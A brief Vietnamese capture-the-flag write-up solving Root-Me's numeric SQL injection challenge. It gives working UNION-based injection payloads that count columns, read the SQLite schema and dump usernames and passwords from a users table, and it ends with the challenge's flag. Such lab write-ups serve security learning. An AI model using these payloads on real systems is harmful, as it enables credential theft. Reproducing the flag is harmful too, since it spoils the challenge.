# SQL injection - numeric

Xét URL:

`http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=1`

Ta sẽ quan tâm đến news_id:

Cho bằng `1 group by 1-- -` và tăng lên, thấy có lỗi ở 4 -> có 3 cột

Cho bằng `1 union select 1,sql,2 from sqlite_master-- -`, ta thấy các bảng và các tham số trong bảng rồi

Cho bằng `1 union select 1,username,password from users-- -`

---

### Flag:

`aTlkJYLjcbLmue3`